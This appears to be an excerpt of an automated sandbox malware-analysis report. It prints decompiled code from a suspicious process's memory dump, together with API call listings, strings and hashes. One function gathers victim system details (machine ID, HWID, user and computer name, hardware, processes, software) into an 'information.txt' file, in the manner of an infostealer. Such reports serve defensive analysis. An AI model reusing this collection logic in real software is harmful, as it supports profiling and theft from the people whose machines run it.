                                                                    				if(_t210[0x14] >= 0x10) {
                                                                    					_t210 =  *_t210;
                                                                    				}
                                                                    				lstrcatA(_t295, _t210);
                                                                    				E00404354(_t309 - 0x18c, 1, 0);
                                                                    				E00404354(_t309 - 0x170, 1, 0);
                                                                    				 *(_t309 - 4) =  *(_t309 - 4) | 0xffffffff;
                                                                    				E00404354(_t309 - 0x154, 1, 0);
                                                                    				_t215 = E00415890(0, _t309 - 0x154, _t293, _t295, _t309 - 0x154, _t333, _t338);
                                                                    				 *(_t309 - 4) = 0xe;
                                                                    				_t217 = E00404697(_t309 - 0x154, _t309 - 0x170, "TimeZone: ", _t215);
                                                                    				 *(_t309 - 4) = 0xf;
                                                                    				_t219 = E0040C20F(_t309 - 0x154, _t309 - 0x18c, _t217, "\n\n");
                                                                    				 *(_t309 - 4) = 0x10;
                                                                    				_t334 = _t219[0x14] - 0x10;
                                                                    				if(_t219[0x14] >= 0x10) {
                                                                    					_t219 =  *_t219;
                                                                    				}
                                                                    				lstrcatA(_t295, _t219);
                                                                    				E00404354(_t309 - 0x18c, 1, 0);
                                                                    				E00404354(_t309 - 0x170, 1, 0);
                                                                    				 *(_t309 - 4) =  *(_t309 - 4) | 0xffffffff;
                                                                    				E00404354(_t309 - 0x154, 1, 0);
                                                                    				 *((intOrPtr*)(_t309 - 0x140)) = 0xf;
                                                                    				 *((intOrPtr*)(_t309 - 0x144)) = 0;
                                                                    				 *(_t309 - 0x154) = 0;
                                                                    				E00404396(_t309 - 0x154, _t334, "[Hardware]\n", 0xb);
                                                                    				 *(_t309 - 4) = 0x11;
                                                                    				_t335 =  *((intOrPtr*)(_t309 - 0x140)) - 0x10;
                                                                    				_t225 =  *(_t309 - 0x154);
                                                                    				if( *((intOrPtr*)(_t309 - 0x140)) < 0x10) {
                                                                    					_t225 = _t309 - 0x154;
                                                                    				}
                                                                    				lstrcatA(_t295, _t225);
                                                                    				 *(_t309 - 4) =  *(_t309 - 4) | 0xffffffff;
                                                                    				E00404354(_t309 - 0x154, 1, 0);
                                                                    				lstrcatA(_t295, "Processor: ");
                                                                    				lstrcatA(_t295, E00414F5B(_t295, 1));
                                                                    				lstrcatA(_t295, 0x43c8dc);
                                                                    				_t232 = E00414F0E(0, _t293, _t309 - 0x154, 1, _t335);
                                                                    				 *(_t309 - 4) = 0x12;
                                                                    				_t234 = E00404697(_t309 - 0x154, _t309 - 0x170, "CPU Count: ", _t232);
                                                                    				 *(_t309 - 4) = 0x13;
                                                                    				_t236 = E0040C20F(_t309 - 0x154, _t309 - 0x18c, _t234, 0x43c8dc);
                                                                    				 *(_t309 - 4) = 0x14;
                                                                    				if(_t236[0x14] >= 0x10) {
                                                                    					_t236 =  *_t236;
                                                                    				}
                                                                    				_t308 =  *(_t309 - 0x364);
                                                                    				lstrcatA(_t308, _t236);
                                                                    				E00404354(_t309 - 0x18c, 1, 0);
                                                                    				E00404354(_t309 - 0x170, 1, 0);
                                                                    				 *(_t309 - 4) =  *(_t309 - 4) | 0xffffffff;
                                                                    				E00404354(_t309 - 0x154, 1, 0);
                                                                    				lstrcatA(_t308, "RAM: ");
                                                                    				lstrcatA(_t308, E004151AA(0, _t308));
                                                                    				lstrcatA(_t308, 0x43c8dc);
                                                                    				lstrcatA(_t308, "VideoCard: ");
                                                                    				 *(_t309 - 0x358) = 0x1a8;
                                                                    				EnumDisplayDevicesA(0, 0, _t309 - 0x358, 1);
                                                                    				lstrcatA(_t308, _t309 - 0x334);
                                                                    				lstrcatA(_t308, 0x43c8dc);
                                                                    				lstrcatA(_t308, "[Processes]\n");
                                                                    				E00415A22(0, _t293, 0x43c8dc, _t308,  *(_t309 - 4));
                                                                    				lstrcatA(_t308, "\n[Software]\n");
                                                                    				E00415007();
                                                                    				E0041CE7C( *((intOrPtr*)(_t309 - 0x360)), "\\information.txt",  *0x446320(_t308, _t308), 3);
                                                                    				return E00420888(0, 0x43c8dc, _t308);
                                                                    			}



































                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 0040AFBD
                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F,00000364,0040BC82), ref: 0040AFD5
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040AFDC
                                                                    • __time64.LIBCMT ref: 0040AFF1
                                                                      • Part of subcall function 0041ED37: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0040AFF6,?), ref: 0041ED42
                                                                      • Part of subcall function 0041ED37: __aulldiv.LIBCMT ref: 0041ED62
                                                                    • __localtime64_s.LIBCMT ref: 0040B005
                                                                    • _asctime_s.LIBCMT ref: 0040B017
                                                                    • lstrcatA.KERNEL32(00000000,Version: ,?,?,?,00000000), ref: 0040B025
                                                                    • lstrcatA.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0040B043
                                                                    • lstrcatA.KERNEL32(00000000,0043EC3C,00000001,00000000,?,?,?,00000000), ref: 0040B063
                                                                    • lstrcatA.KERNEL32(00000000,Date: ,?,?,?,00000000), ref: 0040B06F
                                                                    • lstrcatA.KERNEL32(00000000,?,?,?,?,00000000), ref: 0040B07A
                                                                    • lstrcatA.KERNEL32(00000000,MachineID: ,?,?,?,00000000), ref: 0040B086
                                                                    • lstrcatA.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0040B0A4
                                                                    • lstrcatA.KERNEL32(00000000,GUID: ,00000001,00000000,?,?,?,00000000), ref: 0040B0C2
                                                                    • lstrcatA.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0040B0E4
                                                                    • lstrcatA.KERNEL32(00000000,HWID: ,00000001,00000000,?,?,?,00000000), ref: 0040B102
                                                                    • lstrcatA.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0040B124
                                                                    • lstrcatA.KERNEL32(00000000,Path: ,00000001,00000000,?,?,?,00000000), ref: 0040B142
                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,00000000), ref: 0040B148
                                                                    • lstrcatA.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0040B16C
                                                                    • lstrcatA.KERNEL32(00000000,Work Dir: In memory,00000001,00000000,?,?,?,00000000), ref: 0040B18B
                                                                    • lstrcatA.KERNEL32(00000000,0043EC3C,?,?,?,00000000), ref: 0040B197
                                                                    • lstrcatA.KERNEL32(00000000,Windows: ,?,?,?,00000000), ref: 0040B1A3
                                                                      • Part of subcall function 0041527A: _memset.LIBCMT ref: 004152B2
                                                                      • Part of subcall function 0041527A: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?,?,?,00000001), ref: 004152CE
                                                                      • Part of subcall function 0041527A: RegQueryValueExA.ADVAPI32(?,ProductName,00000000,00000000,?,?,?,?,00000001), ref: 004152ED
                                                                      • Part of subcall function 0041527A: RegCloseKey.ADVAPI32(?,?,?,00000001), ref: 004152F6
                                                                      • Part of subcall function 0041527A: CharToOemA.USER32(?,?), ref: 00415307
                                                                    • lstrcatA.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0040B1B0
                                                                    • lstrcatA.KERNEL32(00000000,0043EC94,?,?,?,00000000), ref: 0040B1BC
                                                                    • GetCurrentProcess.KERNEL32(?,?,?,?,00000000), ref: 0040B1CF
                                                                    • IsWow64Process.KERNEL32(00000000,?,?,?,00000000), ref: 0040B1D6
                                                                    • lstrcatA.KERNEL32(00000000,x86,?,?,?,00000000), ref: 0040B1F4
                                                                    • lstrcatA.KERNEL32(00000000,0043EC98,?,?,?,00000000), ref: 0040B200
                                                                    • lstrcatA.KERNEL32(00000000,Computer Name: ,?,?,?,00000000), ref: 0040B20C
                                                                    • lstrcatA.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0040B219
                                                                    • lstrcatA.KERNEL32(00000000,0043C8DC,?,?,?,00000000), ref: 0040B226
                                                                    • lstrcatA.KERNEL32(00000000,User Name: ,?,?,?,00000000), ref: 0040B232
                                                                    • GetUserNameA.ADVAPI32 ref: 0040B250
                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 0040B25E
                                                                    • lstrcatA.KERNEL32(00000000,0043C8DC), ref: 0040B266
                                                                    • lstrcatA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 0040B2B6
                                                                    • lstrcatA.KERNEL32(00000000,00000000,?,?,?,00000000,00000001,00000000,?,?,?,?,?,?), ref: 0040B334
                                                                    • lstrcatA.KERNEL32(00000000,Keyboard Languages: ,00000001,00000000,00000001,00000000,00000001,00000000,?,?,?,00000000,00000001,00000000), ref: 0040B370
                                                                    • lstrcatA.KERNEL32(00000000,00000000,?,?,?,00000000,00000001,00000000,?,?,?,?,?,?), ref: 0040B37D
                                                                    • lstrcatA.KERNEL32(00000000,0043C8DC,?,?,?,00000000,00000001,00000000,?,?,?,?,?,?), ref: 0040B385
                                                                    • lstrcatA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000001,00000000), ref: 0040B3D6
                                                                    • lstrcatA.KERNEL32(00000000,00000000,?,?,?,00000000,00000001,00000000,?,?,?,?,?,?), ref: 0040B458
                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 0040B4D2
                                                                    • lstrcatA.KERNEL32(00000000,Processor: ,00000001,00000000), ref: 0040B4EF
                                                                    • lstrcatA.KERNEL32(00000000,00000000), ref: 0040B4FC
                                                                    • lstrcatA.KERNEL32(00000000,0043C8DC), ref: 0040B508
                                                                    • lstrcatA.KERNEL32(?,00000000,?,?,?,00000000,00000001,00000000,?,?,?,00000000,00000001,00000000), ref: 0040B563
                                                                    • lstrcatA.KERNEL32(?,RAM: ,00000001,00000000,00000001,00000000,00000001,00000000,?,?,?,00000000,00000001,00000000), ref: 0040B59D
                                                                    • lstrcatA.KERNEL32(?,00000000,?,?,?,00000000,00000001,00000000,?,?,?,00000000,00000001,00000000), ref: 0040B5AA
                                                                    • lstrcatA.KERNEL32(?,0043C8DC,?,?,?,00000000,00000001,00000000,?,?,?,00000000,00000001,00000000), ref: 0040B5B2
                                                                    • lstrcatA.KERNEL32(?,VideoCard: ,?,?,?,00000000,00000001,00000000,?,?,?,00000000,00000001,00000000), ref: 0040B5BE
                                                                    • EnumDisplayDevicesA.USER32 ref: 0040B5D9
                                                                    • lstrcatA.KERNEL32(?,?), ref: 0040B5E7
                                                                    • lstrcatA.KERNEL32(?,0043C8DC), ref: 0040B5EF
                                                                    • lstrcatA.KERNEL32(?,[Processes]), ref: 0040B5FB
                                                                    • lstrcatA.KERNEL32(?,[Software]), ref: 0040B60C
                                                                    • lstrlen.KERNEL32(?,?), ref: 0040B619
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$Process$CurrentHeapTime$AllocCharCloseDevicesDisplayEnumFileH_prolog3_NameOpenQuerySystemUserValueWow64__aulldiv__localtime64_s__time64_asctime_s_memsetlstrlen
                                                                    • String ID: Path: $GUID: $HWID: $Work Dir: In memory$[Software]$CPU Count: $Computer Name: $Date: $Display Language: $Display Resolution: $Keyboard Languages: $Local Time: $MachineID: $Processor: $RAM: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $[Hardware]$[Processes]$\information.txt$x64$x86
                                                                    • API String ID: 1335850989-734002641
                                                                    • Opcode ID: 53b38351b64c9ed1f71df56214278ff7a7c5ae542ae4dbf7256e907beb8166d8
                                                                    • Instruction ID: baad301e06235c4e2ba7717504205242f553dcd095e1ccd8dd14774e29db1a1a
                                                                    • Opcode Fuzzy Hash: 53b38351b64c9ed1f71df56214278ff7a7c5ae542ae4dbf7256e907beb8166d8
                                                                    • Instruction Fuzzy Hash: E6027E71900118EFDB11AB51DD4AFEE7B7CEB4A315F1000AAF115A71E1CB784B898B6E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 80%
                                                                    			E004113E3(void* __ebx, void* __ecx, long* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                    				void* __ebp;
                                                                    				signed int _t130;
                                                                    				intOrPtr _t136;
                                                                    				intOrPtr _t142;
                                                                    				long* _t153;
                                                                    				long _t159;
                                                                    				void* _t161;
                                                                    				intOrPtr* _t165;
                                                                    				void* _t173;
                                                                    				void* _t188;
                                                                    				void* _t196;
                                                                    				long _t225;
                                                                    				void* _t226;
                                                                    				long* _t255;
                                                                    				void* _t256;
                                                                    				void* _t260;
                                                                    				void* _t261;
                                                                    				void* _t262;
                                                                    				void* _t269;
                                                                    				void* _t270;
                                                                    				signed int _t271;
                                                                    				void* _t273;
                                                                    				void* _t274;
                                                                    				void* _t275;
                                                                    				void* _t277;
                                                                    				void* _t278;
                                                                    				void* _t279;
                                                                    				void* _t280;
                                                                    				void* _t281;
                                                                    
                                                                    				_t281 = __eflags;
                                                                    				_t253 = __edx;
                                                                    				_t274 = _t273 - 0x70;
                                                                    				_t271 = _t274 - 4;
                                                                    				_t130 =  *0x443674; // 0x393162b1
                                                                    				 *(_t271 + 0x70) = _t130 ^ _t271;
                                                                    				_push(0x24);
                                                                    				E004207D5(E004341F1, __ebx, __edi, __esi);
                                                                    				 *((intOrPtr*)(_t271 - 0x30)) =  *((intOrPtr*)(_t271 + 0x7c));
                                                                    				_t225 = 0;
                                                                    				 *((intOrPtr*)(_t271 - 0x2c)) =  *((intOrPtr*)(_t271 + 0x80));
                                                                    				_t255 = __edx;
                                                                    				_t136 = 0xf;
                                                                    				 *(_t271 - 0x20) = __edx;
                                                                    				 *((intOrPtr*)(_t271 - 0x24)) = 0;
                                                                    				 *(_t271 - 0x10) = 0;
                                                                    				 *(_t271 - 0x14) = 0;
                                                                    				 *((intOrPtr*)(_t271 + 0x68)) = _t136;
                                                                    				 *((intOrPtr*)(_t271 + 0x64)) = 0;
                                                                    				 *(_t271 + 0x54) = 0;
                                                                    				 *((intOrPtr*)(_t271 - 4)) = 0;
                                                                    				 *((intOrPtr*)(_t271 + 0x4c)) = _t136;
                                                                    				 *((intOrPtr*)(_t271 + 0x48)) = 0;
                                                                    				 *((char*)(_t271 + 0x38)) = 0;
                                                                    				_push(_t271 - 0x14);
                                                                    				_push(__ecx);
                                                                    				 *((char*)(_t271 - 4)) = 1;
                                                                    				 *((intOrPtr*)(_t271 - 0x24)) = E004112D0(0, _t271 - 0x10, __edx, __esi, _t281);
                                                                    				_t260 = HeapAlloc(GetProcessHeap(), 8,  *(_t271 - 0x14));
                                                                    				if(_t260 != 0) {
                                                                    					E0041E192(_t260,  *(_t271 - 0x14),  *(_t271 - 0x10));
                                                                    					_t275 = _t274 + 0xc;
                                                                    					__eflags =  *(_t271 - 0x10);
                                                                    					if( *(_t271 - 0x10) != 0) {
                                                                    						HeapFree(GetProcessHeap(), 0,  *(_t271 - 0x10));
                                                                    						 *(_t271 - 0x10) = 0;
                                                                    					}
                                                                    					_t142 =  *((intOrPtr*)(_t271 - 0x24));
                                                                    					__eflags = _t142 - 0xff;
                                                                    					if(__eflags != 0) {
                                                                    						 *((intOrPtr*)(_t271 - 0x28)) = _t142;
                                                                    						goto L15;
                                                                    					} else {
                                                                    						_push(_t271 - 0x14);
                                                                    						_push(_t260);
                                                                    						E004112D0(_t225, _t271 - 0x10, _t255, _t260, __eflags);
                                                                    						HeapFree(GetProcessHeap(), _t225, _t260);
                                                                    						_t270 = HeapAlloc(GetProcessHeap(), 8,  *(_t271 - 0x14));
                                                                    						__eflags = _t270 - _t225;
                                                                    						if(_t270 == _t225) {
                                                                    							goto L1;
                                                                    						}
                                                                    						E0041E192(_t270,  *(_t271 - 0x14),  *(_t271 - 0x10));
                                                                    						_t280 = _t275 + 0xc;
                                                                    						__eflags =  *(_t271 - 0x10) - _t225;
                                                                    						if(__eflags != 0) {
                                                                    							HeapFree(GetProcessHeap(), _t225,  *(_t271 - 0x10));
                                                                    							 *(_t271 - 0x10) = _t225;
                                                                    						}
                                                                    						_push(_t271 - 0x14);
                                                                    						_push(_t270);
                                                                    						 *((intOrPtr*)(_t271 - 0x28)) = E004112D0(_t225, _t271 - 0x10, _t255, _t270, __eflags);
                                                                    						HeapFree(GetProcessHeap(), _t225, _t270);
                                                                    						_t260 = HeapAlloc(GetProcessHeap(), 8,  *(_t271 - 0x14));
                                                                    						__eflags = _t260 - _t225;
                                                                    						if(_t260 == _t225) {
                                                                    							goto L1;
                                                                    						} else {
                                                                    							E0041E192(_t260,  *(_t271 - 0x14),  *(_t271 - 0x10));
                                                                    							_t275 = _t280 + 0xc;
                                                                    							__eflags =  *(_t271 - 0x10) - _t225;
                                                                    							if(__eflags != 0) {
                                                                    								HeapFree(GetProcessHeap(), _t225,  *(_t271 - 0x10));
                                                                    								 *(_t271 - 0x10) = _t225;
                                                                    							}
                                                                    							L15:
                                                                    							_push(_t271 - 0x14);
                                                                    							_push(_t260);
                                                                    							 *(_t271 - 0x18) = E004112D0(_t225, _t271 - 0x10, _t255, _t260, __eflags) + _t144;
                                                                    							HeapFree(GetProcessHeap(), _t225, _t260);
                                                                    							_t261 = HeapAlloc(GetProcessHeap(), 8,  *(_t271 - 0x14));
                                                                    							 *(_t271 - 0x1c) = _t261;
                                                                    							__eflags = _t261 - _t225;
                                                                    							if(_t261 == _t225) {
                                                                    								goto L1;
                                                                    							}
                                                                    							E0041E192(_t261,  *(_t271 - 0x14),  *(_t271 - 0x10));
                                                                    							_t277 = _t275 + 0xc;
                                                                    							__eflags =  *(_t271 - 0x10) - _t225;
                                                                    							if( *(_t271 - 0x10) != _t225) {
                                                                    								HeapFree(GetProcessHeap(), _t225,  *(_t271 - 0x10));
                                                                    							}
                                                                    							_t159 =  *0x446320(_t261) + 1 -  *(_t271 - 0x18);
                                                                    							 *(_t271 - 0x14) = _t159;
                                                                    							_t161 = HeapAlloc(GetProcessHeap(), 8, _t159);
                                                                    							 *(_t271 - 0x10) = _t161;
                                                                    							__eflags = _t161 - _t225;
                                                                    							if(_t161 == _t225) {
                                                                    								L4:
                                                                    								_t255[5] = 0xf;
                                                                    								_t255[4] = _t225;
                                                                    								 *_t255 = _t225;
                                                                    								E00404331(_t255, 0x43c8d8);
                                                                    								E00404354(_t271 + 0x38, 1, _t225);
                                                                    								E00404354(_t271 + 0x54, 1, _t225);
                                                                    								_t153 = _t255;
                                                                    								goto L30;
                                                                    							} else {
                                                                    								 *(_t271 + 0x30) = 0xf;
                                                                    								 *(_t271 + 0x2c) = _t225;
                                                                    								 *(_t271 + 0x1c) = _t225;
                                                                    								E00404331(_t271 + 0x1c, _t261);
                                                                    								 *((char*)(_t271 - 4)) = 2;
                                                                    								_t165 = E0040C034(_t271 + 0x1c, _t271, _t271 + 0x1c,  *(_t271 - 0x18),  *0x446320(_t261));
                                                                    								__eflags =  *((intOrPtr*)(_t165 + 0x14)) - 0x10;
                                                                    								if( *((intOrPtr*)(_t165 + 0x14)) >= 0x10) {
                                                                    									_t165 =  *_t165;
                                                                    								}
                                                                    								E0041E192( *(_t271 - 0x10),  *(_t271 - 0x14), _t165);
                                                                    								_t278 = _t277 + 0xc;
                                                                    								E00404354(_t271, 1, _t225);
                                                                    								 *((char*)(_t271 - 4)) = 1;
                                                                    								E00404354(_t271 + 0x1c, 1, _t225);
                                                                    								HeapFree(GetProcessHeap(), _t225,  *(_t271 - 0x1c));
                                                                    								_t79 =  *0x446320( *(_t271 - 0x10)) + 1; // 0x1
                                                                    								_t264 = _t79;
                                                                    								 *(_t271 - 0x14) = _t264;
                                                                    								_t173 = HeapAlloc(GetProcessHeap(), 8, _t264);
                                                                    								_push( *(_t271 - 0x10));
                                                                    								 *(_t271 - 0x1c) = _t173;
                                                                    								__eflags = _t173 - _t225;
                                                                    								if(_t173 == _t225) {
                                                                    									L3:
                                                                    									HeapFree(GetProcessHeap(), _t225, ??);
                                                                    									goto L4;
                                                                    								} else {
                                                                    									_push(_t264);
                                                                    									_push(_t173);
                                                                    									E0041E192();
                                                                    									_t279 = _t278 + 0xc;
                                                                    									HeapFree(GetProcessHeap(), _t225,  *(_t271 - 0x10));
                                                                    									 *(_t271 - 0x10) = _t225;
                                                                    									 *(_t271 - 0x18) = _t225;
                                                                    									__eflags =  *((intOrPtr*)(_t271 - 0x28)) - _t225;
                                                                    									if(__eflags <= 0) {
                                                                    										L27:
                                                                    										__eflags =  *((intOrPtr*)(_t271 - 0x24)) - 0xff;
                                                                    										if( *((intOrPtr*)(_t271 - 0x24)) == 0xff) {
                                                                    											 *(_t271 + 0x30) = 0xf;
                                                                    											 *(_t271 + 0x2c) = _t225;
                                                                    											 *(_t271 + 0x1c) = _t225;
                                                                    											E00404331(_t271 + 0x1c,  *((intOrPtr*)(_t271 - 0x30)));
                                                                    											 *((char*)(_t271 - 4)) = 3;
                                                                    											E004042ED(_t271 + 0x38, _t271 + 0x1c);
                                                                    											 *((char*)(_t271 - 4)) = 1;
                                                                    											E00404354(_t271 + 0x1c, 1, _t225);
                                                                    											E0040C297(_t271 + 0x38,  *((intOrPtr*)(_t271 - 0x2c)));
                                                                    											_t188 = E0040C034(_t271 + 0x1c, _t271, _t271 + 0x54,  *((intOrPtr*)(_t271 + 0x48)),  *((intOrPtr*)(_t271 + 0x64)));
                                                                    											 *((char*)(_t271 - 4)) = 4;
                                                                    											E004042ED(_t271 + 0x54, _t188);
                                                                    											 *((char*)(_t271 - 4)) = 1;
                                                                    											E00404354(_t271, 1, _t225);
                                                                    											_t255 =  *(_t271 - 0x20);
                                                                    										}
                                                                    										HeapFree(GetProcessHeap(), _t225,  *(_t271 - 0x1c));
                                                                    										_t255[5] = 0xf;
                                                                    										_t255[4] = _t225;
                                                                    										 *_t255 = _t225;
                                                                    										E004042ED(_t255, _t271 + 0x54);
                                                                    										E00404354(_t271 + 0x38, 1, _t225);
                                                                    										E00404354(_t271 + 0x54, 1, _t225);
                                                                    										_t153 =  *(_t271 - 0x20);
                                                                    										L30:
                                                                    										 *[fs:0x0] =  *((intOrPtr*)(_t271 - 0xc));
                                                                    										_pop(_t256);
                                                                    										_pop(_t262);
                                                                    										_pop(_t226);
                                                                    										return E0041DA9B(_t153, _t226,  *(_t271 + 0x70) ^ _t271, _t253, _t256, _t262);
                                                                    									} else {
                                                                    										goto L23;
                                                                    									}
                                                                    									while(1) {
                                                                    										L23:
                                                                    										_push(_t271 - 0x14);
                                                                    										_push( *(_t271 - 0x1c));
                                                                    										_t250 = _t271 - 0x10;
                                                                    										_t269 = E004112D0(_t225, _t271 - 0x10, _t255, _t264, __eflags);
                                                                    										HeapFree(GetProcessHeap(), _t225,  *(_t271 - 0x1c));
                                                                    										_t196 = HeapAlloc(GetProcessHeap(), 8,  *(_t271 - 0x14));
                                                                    										 *(_t271 - 0x1c) = _t196;
                                                                    										__eflags = _t196 - _t225;
                                                                    										if(_t196 == _t225) {
                                                                    											goto L1;
                                                                    										}
                                                                    										E0041E192(_t196,  *(_t271 - 0x14),  *(_t271 - 0x10));
                                                                    										_t279 = _t279 + 0xc;
                                                                    										__eflags =  *(_t271 - 0x10) - _t225;
                                                                    										if( *(_t271 - 0x10) != _t225) {
                                                                    											HeapFree(GetProcessHeap(), _t225,  *(_t271 - 0x10));
                                                                    											 *(_t271 - 0x10) = _t225;
                                                                    										}
                                                                    										_t264 = _t271 + 0x54;
                                                                    										E0040C3CF(1, _t250, _t271 + 0x54, _t271, _t269);
                                                                    										 *(_t271 - 0x18) =  *(_t271 - 0x18) + 1;
                                                                    										_t255 =  *(_t271 - 0x20);
                                                                    										_t225 = 0;
                                                                    										__eflags =  *(_t271 - 0x18) -  *((intOrPtr*)(_t271 - 0x28));
                                                                    										if(__eflags < 0) {
                                                                    											continue;
                                                                    										} else {
                                                                    											goto L27;
                                                                    										}
                                                                    									}
                                                                    									goto L1;
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				L1:
                                                                    				if( *(_t271 - 0x10) == _t225) {
                                                                    					goto L4;
                                                                    				}
                                                                    				_push( *(_t271 - 0x10));
                                                                    				goto L3;
                                                                    			}

































                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 004113FC
                                                                      • Part of subcall function 004112D0: __EH_prolog3_GS.LIBCMT ref: 004112D7
                                                                      • Part of subcall function 004112D0: lstrlen.KERNEL32(?,0000005C,00411449,?,?,00000024), ref: 004112FB
                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,?,00000024), ref: 00411451
                                                                    • HeapAlloc.KERNEL32(00000000,?,?,00000024), ref: 00411458
                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,00000024), ref: 0041146D
                                                                    • HeapFree.KERNEL32(00000000,?,?,00000024), ref: 00411474
                                                                    • _strcpy_s.LIBCMT ref: 004114B6
                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,00000024), ref: 004114C7
                                                                    • HeapFree.KERNEL32(00000000,?,?,00000024), ref: 004114CE
                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,?,?,00000024), ref: 004114F4
                                                                    • HeapFree.KERNEL32(00000000,?,?,00000024), ref: 004114FB
                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,?,00000024), ref: 00411506
                                                                    • HeapAlloc.KERNEL32(00000000,?,?,00000024), ref: 0041150D
                                                                    • _strcpy_s.LIBCMT ref: 00411524
                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,00000024), ref: 00411535
                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000024), ref: 0041153C
                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00000024), ref: 00411557
                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000024), ref: 0041155E
                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,00000024), ref: 00411569
                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000024), ref: 00411570
                                                                    • _strcpy_s.LIBCMT ref: 00411587
                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000024), ref: 00411598
                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000024), ref: 0041159F
                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,?,?,00000024), ref: 004115C1
                                                                    • HeapFree.KERNEL32(00000000,?,?,00000024), ref: 004115C8
                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,?,00000024), ref: 004115D3
                                                                    • HeapAlloc.KERNEL32(00000000,?,?,00000024), ref: 004115DA
                                                                    • _strcpy_s.LIBCMT ref: 004115F4
                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,00000024), ref: 00411605
                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000024), ref: 0041160C
                                                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,00000024), ref: 00411613
                                                                    • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,?,00000024), ref: 00411627
                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000024), ref: 0041162E
                                                                    • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,?,00000024), ref: 0041165A
                                                                    • _strcpy_s.LIBCMT ref: 0041167F
                                                                    • GetProcessHeap.KERNEL32(00000000,?,00000001,00000000,00000001,00000000,?,00000008,00000000,?,?,?,?,?,00000024), ref: 004116A5
                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000024), ref: 004116AC
                                                                    • lstrlen.KERNEL32(?,?,?,?,?,?,00000024), ref: 004116B5
                                                                    • GetProcessHeap.KERNEL32(00000008,00000001,?,?,?,?,?,00000024), ref: 004116C4
                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000024), ref: 004116CB
                                                                    • _strcpy_s.LIBCMT ref: 004116E1
                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000024), ref: 004116ED
                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000024), ref: 004116F4
                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000024), ref: 0041171E
                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000024), ref: 00411725
                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,00000024), ref: 00411730
                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000024), ref: 00411737
                                                                    • _strcpy_s.LIBCMT ref: 0041174F
                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411760
                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000024), ref: 00411767
                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000024), ref: 0041180F
                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000024), ref: 00411816
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Heap$Process$Free$Alloc_strcpy_s$lstrlen$H_prolog3H_prolog3_
                                                                    • String ID:
                                                                    • API String ID: 2500175858-0
